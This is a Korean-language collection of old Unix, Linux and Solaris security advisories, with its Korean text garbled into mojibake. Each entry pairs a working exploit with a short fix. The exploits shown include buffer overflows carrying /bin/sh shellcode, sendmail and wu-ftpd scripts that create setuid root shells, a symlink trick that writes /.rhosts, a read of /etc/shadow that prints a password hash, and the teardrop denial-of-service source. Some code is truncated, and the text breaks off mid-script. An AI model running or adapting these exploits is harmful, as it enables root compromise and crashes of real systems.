Escolar Documentos
Profissional Documentos
Cultura Documentos
À̱°ÍÀÌ ÇØÅÀÌ¿¡¿ä.
°ú°Å¿¡ ³ª¿ì´©¸® °èÁ¤ ¼¹ö ÇØÅÇؼ ³¸®³µ´ø °íµîÇлýÀº À̱ ÇØÅÀ̾úÁÒ.
³Ê¹« °£´ÜÇÏÁÒ?
ÇØÅÀ̶ó´Â °Ç ÀÌÁ¤µµ°¡Áö°í º¼ ¼ö°¡ ¾ø¾î¿ä.
¾ÆÁÖ ÀϺκп¡ ºÒ°úÇϴϱî¿ä
ÇÏÁö¸¸ À̱ °ÍÀ» ¼º°øÇß´Ù°í ¿ìÂá´ë´Â »ç¶÷µéÀÌ ¸¹¾Æ¼ Á» ±×¸³×¿ä.
ÇØ°áÃ¥
nobodyÀÇ UID¸¦ 99 Î Çصξî¶ó.
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º perl 5.003
¸íÉ
sperl5.003
Àû¿ëµÇ´Â È£½ºÆ®
Linux Slackware 3.1, 3.2
¡µåÇÞ ¸®´ª½º
¹®Á¦Á¡
sperl5.003 À̶ó´Â ÆÄÀÏÀ» ¹öÆÛ ¿À¹öÇÃο츦 ½Ãų¼ö ÀÖ´Ù.
#include
#define DEFAULT_OFFSET 640
#define DEFAULT_BUFFER_SIZE 1600
#define NOP 0x90
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[]) {
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i;
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_sp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
for (i = 0; i < bsize/2; i++)
buff[i] = NOP;
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
execl("/usr/bin/sperl5.003","/usr/sbin/sperl5.003",buff, NULL);
}
ÇØ°á
sperl5.003 ÀÇ suid bit¸¦ ¾ø¾Ö¶ó.
¾Æ´Ï¸é 5.003_97f ÀÇ ¹öÁ‾À¸Î ¹Ù²Ù¾î¶ó.
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º sysctl()
¸íÉ
sysctl()
Àû¿ëµÇ´Â ½Ã½ºÅÛ
Linux prior to 2.0.31
¹®Á¦Á¡
sysctl()À̶ó´Â ÇÔ¼ö¿¡ ¹®Á¦°¡ ÀÖ´Ù. syslog floodingÀÌ °¡´ÉÇϸç..
¿À¹öÇÃο츦 ÀÏÀ¸Å³¼ö ÀÖ´Â º¸¾È»ó ¹®Á¦Á¡ÀÌ ¹ß°ßµÇ¾ú´Ù.
#include
main() {
sysctl(NULL, 0x80000000, NULL, NULL, NULL, 0);
/* 0x80000000 can be replaced with 0xC0000000 -- both are negative,
* and
* produce a zero when multiplied by sizeof(int) */
}
ÀÌ¿Í °°Àº ¹®Á¦Á¡Àº getgroups()¶ó´Â ÇÔ¼ö¿¡¼µµ ¸¶Âù°¡Áö´Ù.
ÇØ°á
¹Ýµå½Ã 2.0.31 ÀÎ »ç¶÷¸¸ °íÃĶó.
/usr/src/linux/kernel.sysctl.c ÀÇ ÆÄÀϾȿ¡
struct ctl_table_header *tmp;
void *context;
if (nlen == 0 || nlen >= CTL_MAXNAME) <= ÀÌ°ÍÀ»
if (nlen <= 0 || nlen >= CTL_MAXNAME) <= À̸°Ô °íÃĶó.
return -ENOTDIR;
error = verify_area(VERIFY_READ,name,nlen*sizeof(int));
±×¸®°í ´Ù½Ã ÄÄÆÄÀÏ ½ÃÄѶó. Ä¿³Î ÄÄÆÄÀÏ.
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º&À‾´Ð½º sendmail (1)
¸íÉ
sendmail( 8.7 ~ 8.8.2)
¿µÇâÀÖ´Â ½Ã½ºÅÛ
¼¾µå ¸ÞÀÏÀ» žÀçÇÑ ¸ðµç À‾´Ð½º
¹®Á¦Á¡
´ÙÀ½°ú °°Àº °£´ÜÇÑ ½ºÅ©¸³Æ®Î çÆ®¸¦ ȹµæÇÒ¼ö ÀÖ´Ù.
#/bin/sh
#
#
# Hi !
# This is exploit for sendmail smtpd bug
# (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
# This shell script does a root shell in /tmp directory.
# If you have any problems with it, drop me a letter.
# Have fun !
#
#
# ----------------------
# ---------------------------------------------
# ----------------- Dedicated to my beautiful lady
------------------
# ---------------------------------------------
# ----------------------
#
# Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
#
#
#
echo 'main() '>>leshka.c
echo '{ '>>leshka.c
echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c
echo '} '>>leshka.c
#
#
echo 'main() '>>smtpd.c
echo '{ '>>smtpd.c
echo ' setuid(0); setgid(0); '>>smtpd.c
echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c
echo '} '>>smtpd.c
#
#
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs
"[:digit:]" "\n
"|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
/tmp/sh
ÇØ°áÃ¥
³ôÀº ¹öÁ‾ÀÇ ¼¾µå¸ÞÀÏÀ» ¼³Ä¡ÇÏ´Â ±æ ¹Û¿¡ ¾ø´Ù.
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º&À‾´Ð½º wu-FTP
¸íÉ
wu-FTP ( site exec )
¿µÇâÀÖ´Â ½Ã½ºÅÛ
wu-ftp2.x ¸¦ ±òÀº ¸ðµç À‾´Ð½º ¹öÁ‾
¹®Á¦Á¡
site exec ÀÇ Å« ¹ö±×Î çÆ® ±ÇÇÑÀ¸Î µ¹¾Æ°¡´Â ftpÀÇ À߸øµÈ ¿ÀùÎ
çÆ®±ÇÇÑÀ¸Î È£½ºÆ®ÀÇ ÇÁαץÀ» ½ÇÇà½Ãų¼ö°¡ ÀÖ´Ù.
cat > bug.c
#include
#include
#include
main()
{
seteuid(0);
system("cp /bin/sh /tmp/.sh");
system("chmod 6777 /tmp/.sh");
}
À§ÀÇ ¼Ò½º¸¦ cc -o bug bug.c Î ÄÄÆÄÀÏ ÈÄ¿¡ ftp Î ÀÚ½ÅÀÇ È£½ºÆ®¿¡ Á¢¼Ó
ÇÑ´Ù.
±× ¿¹ÀÌ´Ù.
ftp 0
220 exploitablesys FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994) r
eady.
Name (0:guest): guest
331 Password required for guest.
Password: (password)
230 User guest logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote "site exec bash -c id" (see if sys is exploitable)
200-bash -c id
200-uid=0(root) gid=0(root) euid=505(adm) egid=100(users) groups=100(users)
200 (end of 'bash -c id')
ftp> quote "site exec bash -c /home/guest/bug"
200-bash -c /home/guest/bug
200 (end of 'bash -c /home/guest/bug')
ftp> quit
À§¿Í °°ÀÌ Çϸé bug¶ó´Â ÇÁαץÀÌ çÆ® ±ÇÇÑÀ¸Î µ¹¾Æ°¡°Ô µÈ´Ù.
±×¸°Ô µÇ¸é /tmp µðºÅ丮¿¡ çÆ®±ÇÇÑÀÇ ½©ÀÌ ¸¸µé¾îÁø´Ù.
ÇØ°á
ftp ¹öÁ‾À» ÃÖ½ÅÀ¸Î ¸ÂÃß¾î¶ó.
2.4.2¹öÁ‾ÀÌ¸é ¹«³ÇÏ´Ù.
¶ÇÇÑ ÀǽÉÇÏ´Â ¾ÆÀ̵ð´Â site ¸íÉÀ» »ç¿ëÇÏÁö ¸øÇÏ°Ô Á¦ÇÑÀ» µÎ¾î¶ó
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º&À‾´Ð½º sendmail (2)
¸íÉ
sendmail 8.8.4
½Ã½ºÅÛ
¼¾µå¸ÞÀÏ 8.8.4¸¦ ¿î¿µÇÏ´Â ¸ðµç ½Ã½ºÅÛ
¹®Á¦Á¡
¼¾µå ¸ÞÀÏÀÇ À߸øµÈ ¹ö±×Î ÀÎÇØ /var/tmp¿¡ dead.letterÀ̶ó´Â ÆÄÀÏÀ»
¸¸µå´Âµ¥ ÀÌ´Â çÆ®ÀÇ ±ÇÇÑÀÌ´Ù.
±× ¿¹
ln -s /.rhosts /var/tmp/dead.letter
telnet white.hacker.securi.ty 25
mail from : security@wh.it.e.best
rcpt to : Fuck@fuck.you.haha
data
dlfjs qjrmrk dlTska..
.
quit
À̸°Ô ÇÔÀ¸Î½á çÆ® µðºÅ丮¿¡ .rhosts ÆÄÀÏÀ» ¸¸µé¼ö ÀÖ´Ù.
À̸¦ Á»´õ ÀÀ¿ëÇϸé Æнº¿öµå ÆÄÀÏÀ» ¼Õº¼¼ö ÀÖ´Ù.
ÇØ°áÃ¥
¼¾µå¸ÞÀÏ À» 8.8.5 ÀÌ»óÀ¸Î ¿ÃÁ¶ó.
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º Lizards game
¸íÉ
Lizards game
½Ã½ºÅÛ
½½¢¿þ¾î 3.4
¹®Á¦Á¡
Lizards °ÔÀÓÀº setuid°¡ °ÉÁÀÖ´Â ÇÁαץÀÌ´Ù.
setuid °¡ °ÉÁ ÀÖ´Â ÀÌÀ‾´Â ¹ÙÎ ÀÌ °ÔÀÓÀÌ svgalib¸¦ »ç¿ëÇϱ⠶§¹®ÀÌ´Ù.
±×±µ¥ ±× °ÔÀÓÀÇ ¼Ò½º¸¦ º¸¸é system(clear);¶ó°í ÇÔ¼ö¸¦ »ç¿ëÇß´Ù.
ÀÌ´Â »ç¿ëÀÚÀÇ ÀÔÀåÀ¸Î º¸¸é °£´ÜÈ÷ ±¸¸ÛÀ» ¹ß°ßÇÒ ¼ö ÀÖ´Ù.
path=. ¶ó°í µÎ°í clear ½ºÅ©¸³Æ®¸¦ ÀÛ¼ºÇÏ¿© ±× clear½ºÅ©¸³Æ®¸¦
çÆ®ÀÇ ±ÇÇÑÀ¸Î µ¹¸±¼ö ÀÖ´Ù.
ÇØ°áÃ¥
¿ì¼± ±× ÆÄÀÏÀÇ Æ۹̼ÇÀ» ´Ý¾ÆµÎ¾î¶ó.
chmod -s /usr/games/lizardlib/lizardshi
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º IP fragment overlap
¸íÉ
IP fragment overlap
½Ã½ºÅÛ
¸®´ª½º / À©µµ¿ì NT / À©µµ¿ì 95 / ±âŸ À‾´Ð½º ½Ã½ºÅÛ
¹®Á¦Á¡
¾Æ¡ÀÇ ÇÁαץÀ» µ¹Á¼ ½Ã½ºÅÛÀ» ¸ØÃß°Ô ÇÒ ¼ö ÀÖ´Ù.
/*
* Copyright (c) 1997 route|daemon9
* 11.3.97
*
* Linux/NT/95 Overlap frag bug exploit
*
* Exploits the overlapping IP fragment bug present in all Linux
* kernels and NT 4.0 / Windows 95 (others?)
*
* Based off of: flip.c by klepto
* Compiles on: Linux, *BSD*
*
* gcc -O2 teardrop.c -o teardrop
* OR
* gcc -O2 teardrop.c -o teardrop -DSTRANGE_BSD_BYTE_ORDERING_THING
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#ifdef STRANGE_BSD_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0
*/
#define FIX(n) (n)
#else /* OpenBSD 2.1, all Linux */
#define FIX(n) htons(n)
#endif /* STRANGE_BSD_BYTE_ORDERING_THING */
#define IP_MF 0x2000 /* More IP fragment en route */
#define IPH 0x14 /* IP header size */
#define UDPH 0x8 /* UDP header size */
#define PADDING 0x1c /* datagram frame padding for first packet */
#define MAGIC 0x3 /* Magic Fragment Constant (tm). Should be 2 or 3 *
/
#define COUNT 0x1 /* Linux dies with 1, NT is more stalwart and can
* withstand maybe 5 or 10 sometimes... Experiment.
*/
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);
int main(int argc, char **argv)
{
int one = 1, count = 0, i, rip_sock;
u_long src_ip = 0, dst_ip = 0;
u_short src_prt = 0, dst_prt = 0;
struct in_addr addr;
fprintf(stderr, "teardrop route|daemon9\n\n");
if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror("raw socket");
exit(1);
}
if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(on
e))
< 0)
{
perror("IP_HDRINCL");
exit(1);
}
if (argc < 3) usage(argv[0]);
if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2]
)))
{
fprintf(stderr, "What the hell kind of IP address is that?\n");
exit(1);
}
while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
{
switch (i)
{
case 's': /* source port (should be emphemeral) */
src_prt = (u_short)atoi(optarg);
break;
case 't': /* dest port (DNS, anyone?) */
dst_prt = (u_short)atoi(optarg);
break;
case 'n': /* number to send */
count = atoi(optarg);
break;
default :
usage(argv[0]);
break; /* NOTREACHED */
}
}
srandom((unsigned)(time((time_t)0)));
if (!src_prt) src_prt = (random() % 0xffff);
if (!dst_prt) dst_prt = (random() % 0xffff);
if (!count) count = COUNT;
fprintf(stderr, "Death on flaxen wings:\n");
addr.s_addr = src_ip;
fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
addr.s_addr = dst_ip;
fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
fprintf(stderr, " Amt: %5d\n", count);
fprintf(stderr, "[ ");
for (i = 0; i < count; i++)
{
send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
fprintf(stderr, "b00m ");
usleep(500);
}
fprintf(stderr, "]\n");
return (0);
}
/*
* Send two IP fragments with pathological offsets. We use an implementati
on
* independent way of assembling network packets that does not rely on any
of
* the diverse O/S specific nomenclature hinderances (well, linux vs. BSD).
*/
void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
u_short dst_prt)
{
u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */
u_char byte; /* a byte */
struct sockaddr_in sin; /* socket protocol structure */
sin.sin_family = AF_INET;
sin.sin_port = src_prt;
sin.sin_addr.s_addr = dst_ip;
/*
* Grab some memory for our packet, align p_ptr to point at the beginnin
g
* of our packet, and then fill it with zeros.
*/
packet = (u_char *)malloc(IPH + UDPH + PADDING);
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
byte = 0x45; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kernel *
/
*((u_long *)p_ptr) = src_ip; /* IP source address */
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip; /* IP destination address */
p_ptr += 4;
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */
if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&si
n,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
/* We set the fragment offset to be inside of the previous packet's
* payload (it overlaps inside the previous packet) but do not include
* enough payload to cover complete the datagram. Just the header will
* do, but to crash NT/95 machines, a bit larger of packet seems to wor
k
* better.
*/
p_ptr = &packet[2]; /* IP total length is 2 bytes into the heade
r */
*((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
p_ptr += 4; /* IP offset is 6 bytes into the header */
*((u_short *)p_ptr) = FIX(MAGIC);
if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin,
void usage(u_char *name)
{
fprintf(stderr,
"%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\
n",
name);
exit(0);
}
ÇØ°áÃ¥
Ä¿³ÎÀ» 2.0.32-pre4 Î ¾÷Çضó.
or
¼Ò½º¸¦ ´ÙÀ½°ú °°ÀÌ ¹Ù²ã¼ ´Ù½Ã ÄÄÆÄÀÏ ½ÃÄѶó
--- ip_fragment.c Mon Nov 10 14:58:38 1997
+++ ip_fragment.c.patched Mon Nov 10 19:18:52 1997
@@ -12,6 +12,7 @@
* Alan Cox : Split from ip.c , see ip_input.c for
history.
* Alan Cox : Handling oversized frames
* Uriel Maimon : Accounting errors in two fringe case
s.
+ * route : IP fragment overlap bug
*/
#include
@@ -578,6 +579,22 @@
frag_kfree_s(tmp, sizeof(struct ipfrag));
}
}
+
+ /*
+ * Uh-oh. Some one's playing some park shenanigans on us.
+ * IP fragoverlap-linux-go-b00m bug.
+ * route 11.3.97
+ */
+
+ if (offset > end)
+ {
+ skb->sk = NULL;
+ printk("IP: Invalid IP fragment (offset > end) found from %
s\n", in_ntoa(iph->saddr));
+ kfree_skb(skb, FREE_READ);
+ ip_statistics.IpReasmFails++;
+ ip_free(qp);
+ return NULL;
+ }
/*
* Insert this fragment in the chain of fragments.
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º pppd chatscript
¸íÉ
µ¥ºñ¾È pppd chatscript
½Ã½ºÅÛ
µ¥ºñ¾È ¸®´ª½º
¹®Á¦Á¡
/var/log/ppp.log ÆÄÀÏÀ» ´©±¸³ª ´Ù ÀÐÀ»¼ö ÀÖ°Ô Çسõ¾Ò´Ù.
$> more /var/log/ppp.log
¾î¼±¸ Àú¼±¸.
Dec 14 16:43:14 gateway chat[362]: ^Mlogin -- got it
Dec 14 16:43:14 gateway chat[362]: send (loginname^M)
Dec 14 16:43:15 gateway chat[362]: expect (word)
Dec 14 16:43:15 gateway chat[362]: : loginname^M
Dec 14 16:43:15 gateway chat[362]: Password -- got it
Dec 14 16:43:15 gateway chat[362]: send (³ªÀÇÆнº¿öµå^M)
À̱ Çü½ÄÀ¸Î ³»¿ëÀ» º¸¸é Æнº¿öµå°¡(^^;) º¸ÀδÙ.
ÇØ°áÃ¥
ÆÐÄ¡µÈ ¹öÁ‾ÀÌ ¾ø´Â°Í °°´Ù. ^^;
Áö±ÝÀº ³ª¿ÔÀ» °ÍÀÌ´Ù. ¹öÁ‾À» ¿ÃÁ¶ó
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º X ¼¹ö
¸íÉ
X¼¹ö- XFree 3.3.1 3.2.9 3.1.2 ÀÇ XF86_½Ã¸®Áî
½Ã½ºÅÛ
¿¢½º¼¹ö¸¦ ¾´´À ¸ðµç À‾´Ð½º¹× ¸®´ª½º
¹®Á¦Á¡
´ÙÀ½°ú °°Àº Æí¹ýÀ¸Î ùÁÙÀÇ ÆÄÀÏÀ» º¼¼ö°¡ ÀÖ´Ù.
$ ls -al /etc/shadow
-rw------- 1 root bin 1039 Aug 21 20:12 /etc/shadow
$ id
uid=502(loveyou) gid=500(users) groups=500(users)
$ cd /usr/X11R6/bin
$ ./XF86_SVGA -config /etc/shadow
Unrecognized option: root:qEXaUxSeQ45ls:10171:-1:-1:-1:-1:-1:-1
use: X [:] [option]
-a # mouse acceleration (pixels)
-ac disable access control restrictions
-audit int set audit trail level
-auth file select authorization file
bc enable bug compatibility
-bs disable any backing store support
-c turns off key-click
À̱ Çü½ÄÀÌ´Ù..
ÇØ°áÃ¥
Setuid ¸¦ ¾ø¾Ö´øÁö Æ‾Á¤ ÀÌ¿ëÀÚ¸¸ ¾²µµÏ Çã¶ôÇضó.
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º ¡µåÇÞ 5.0 À‾Æ¿¸®Æ¼
¸íÉ
/bin/ping, /usr/sbin/traceroute, /usr/bin/rlogin, /usr/bin/rsh
(actually glibc2 is guilty one)
½Ã½ºÅÛ
¡µåÇÞ 5.0
¹®Á¦Á¡
¹öÆÛ ¿À¹ö±À» ÀÌ¿ëÇؼ çÆ®¸¦ ¾ò´Â´Ù.
/*
Just Your Standard EGGSHELL Proggie:
traceroute buffer overflow exploit for RedHat Linux 5.0
mostly ripped from Aleph One
Wilton Wong
wwong@blackstar.net
gcc -o trace_shell trace_shell.c
*/
#include
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 1019
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) eggsize = atoi(argv[3]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_sp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';
memcpy(egg,"EGG=",4);
putenv(egg);
memcpy(buff,"RET=",4);
putenv(buff);
printf("Now run: /usr/sbin/traceroute $RET\n");
system("/bin/bash");
}
ÇØ°áÃ¥
ÆÐÄ¡ ¹æ¹ý
$ diff -u /dbase/glibc-2.0.6pre4/resolv/res_query.c /usr/glibc/src/libc/resolv/
--- /dbase/glibc-2.0.6pre4/resolv/res_query.c Mon Jan 6 23:05:43 1997
+++ /usr/glibc/src/libc/resolv/res_query.c Mon Dec 8 09:05:53 1997
@@ -321,7 +321,7 @@
u_char *answer; /* buffer to put answer */
int anslen; /* size of answer */
{
- char nbuf[MAXDNAME];
+ char nbuf[MAXDNAME * 2 + 2]; /*À̺κÐÀ» À§¿Í ¹Ù²Ù¸é µÈ´Ù.*/
const char *longname = nbuf;
int n;
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º crontab
¸íÉ
dillon crontab / crond ( dcron 2.2 )
½Ã½ºÅÛ
½½º¿þ¾î 3.4
¹®Á¦Á¡
¹öÆÛ ¿À¹ö ÇÃο츦 ÀÌ¿ëÇؼ çÆ®¸¦ ¾òÀ»¼ö ÀÖ´Ù.
ÀáÀçÀûÀÎ ¹öÆÛ ¿À¹ö ÇÃοìÀÇ °¡´É¼ºÀÌ º¸ÀδÙ.
ÇØ°áÃ¥
´ÙÀ½ÀÇ »çÀÌÆ®¿¡¼ ÆÐÄ¡ ¹öÁ‾À» ¹Þ´Â´Ù.
ftp://ftp.cdrom.com/pub/linux/slackware-3.4/slakware/a2/bin.tgz
ftp://ftp.cdrom.com/pub/linux/slackware-3.4/source/a/bin/dcron22.tar.gz
ftp://ftp.cdrom.com/pub/linux/slackware-3.4/source/a/bin/dcron22.diff.gz
---------------------------
Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º xterm
¸íÉ
xterm
½Ã½ºÅÛ
¼Ö¶ó¸®½º 2.5.1(SunOS 5.5.1)
¹®Á¦Á¡
¹öÆÛ ¿À¹ö ÇÃο츦 ÀÏÀ¸ÄÑ º¸¾È»ó ÇêÁ¡À» ¸¸µé¼ö ÀÖ´Ù.
±× ¿¹Á¦ÀÌ´Ù.
/*
* X11R6.3 xterm exploit for solaris 2.5.1 by DCRH 28/5/97
*
*/
#include
#include
#include
#include
#define EXTRA2 1300
#define BUF_LENGTH 400
#define EXTRA 500
/* Need an addr such that contents of addr+0xe98 = 0 */
#define SAFE_ADDR ((unsigned)0xefff2008)
#define STACK_OFFSET 0x4800
#define SPARC_NOP 0xa61cc013
u_long sparc_shellcode[] =
{
"½©ÄÚµå"
};
u_long get_sp(void)
{
asm("mov %sp,%i0 \n");
}
char buf[BUF_LENGTH + EXTRA + EXTRA2 + 8];
char longvar[0x4000] = "BLAH=";
void main(int argc, char *argv[])
{
char *env[2];
unsigned long targ_addr;
u_long *long_p;
int i, code_length = sizeof(sparc_shellcode),dso=0;
if(argc > 1) dso=atoi(argv[1]);
long_p =(u_long *) buf;
for (i = 0; i < EXTRA2 / sizeof(u_long); i++)
*long_p++ = (SAFE_ADDR >> 8) | (SAFE_ADDR << 24);
targ_addr = get_sp() - STACK_OFFSET - dso;
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;
for (i = 0; i < code_length / sizeof(u_long); i++)
*long_p++ = sparc_shellcode[i];
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ = targ_addr;
printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
/* This is just to shove the stack down a bit */
memset(&longvar[5], 'a', sizeof longvar-6);
longvar[sizeof longvar -1] = '\0';
env[0] = longvar;
env[1] = NULL;
execle("./xterm", "xterm", "-xrm", buf,(char *) 0, env);
perror("execl failed");
}
ÇØ°áÃ¥
´ÙÀ½ÀÇ »çÀÌÆ®¿¡¼ ¿ÍÆÛ¸¦ ±¸Çشٰ¡ ¼³Ä¡Ç϶ó.
ftp://ftp.auscert.org.au/pub/auscert/tools/overflow_wrapper
/overflow_wrapper.c
or
http://cegt201.bradley.edu/~im14u2c/wrapper/
---------------------------
Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º ff.core
¸íÉ
/usr/openwin/bin/ff.core
½Ã½ºÅÛ
¼Ö¶ó¸®½º 2.4
¹®Á¦Á¡
IFS=/À» ÀÌ¿ëÇؼ /usr/??ÇÁαץÀ» µ¹¸®Á´Â ff.core ÆÄÀÏÀÇ º»¡ ÃëÁö¸¦
¹þ¾î³ª usr ÇÁαץÀ» µ¹¸®°í ±× µÚÀÇ °ÍµéÀº Àμöνá ÀÛ¿ëÇÏ°Ô ¸¸µç´Ù.
´ÙÀ½Àº ±× ¿¹Á¦ÀÌ´Ù.
% ksh
% cd /tmp
% cp /bin/ksh .
% echo "chown root ksh; chmod u+s ksh" > usr
% chmod +x usr
% export IFS=/
% ÇÑÁÙÀÇ ¾î¶² ¸íÉ ..
% ./ksh
#
ÇØ°áÃ¥
ÆÐÄ¡Çضó.
---------------------------
Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º gethostbyname()
¸íÉ
gethostbyname()
½Ã½ºÅÛ
¼Ö¶ó¸®½º 2.5 2.5.1
¹®Á¦Á¡
¹öÆÛ ¿À¹ö ÇÃο츦 ÀÏÀ¸ÄѼ ½©À» ½ÇÇà½ÃŲ´Ù..çÆ® ¼ÒÀ‾Î.
±× ¿¹Á¦ÀÌ´Ù.
/*
* rlogin-exploit.c: gets a root shell on most Solaris 2.5/2.5.1 machines
* by exploiting the gethostbyname() overflow in rlogin.
*
* gcc -o rlogin-exploit rlogin-exploit.c
*
* Jeremy Elson, 18 Nov 1996
* jeremy.elson@nih.gov
*/
#include
#include
#include
#include
#define BUF_LENGTH 8200
#define EXTRA 100
#define STACK_OFFSET 4000
#define SPARC_NOP 0xa61cc013
u_char sparc_shellcode[] ="½©ÄÚµå";
u_long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
void main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA];
long targ_addr;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen(sparc_shellcode);
long_p = (u_long *) buf;
for (i = 0; i<(BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;
char_p = (u_char *) long_p;
for (i = 0; i out & (and go to sleep).
#
# version 3.91, 3.92 .....
# version 3.95 fixed
#
# Note: must do some changes in the script. look 4 CHANGE THIS:
#
# Yea i know is a lame script but is better than nothing..
# try to exploit the bug without a script and you will wait
# forever.
# e-torres@uniandes.edu.co
#
argumentos=0
if [ $# -eq $argumentos ]
then
echo "Usage: $0 username path/file_to_create & "
echo "ET Lownoise 1996 Colombia"
exit
fi
username=$1
archivo=$2
#CHANGE THIS:
#text='text to puit in file to create'
#usr=path of the program users
#pineprog=how the pine program appears when u do a w (who) command
text='+ +'
usr=users
pineprog=pine
#
date
echo "- Looking for $1 to log in... just wait"
#
entrada=0
entro=0
until [ $entro -eq $entrada ]
do
for nombre in `$usr`
do
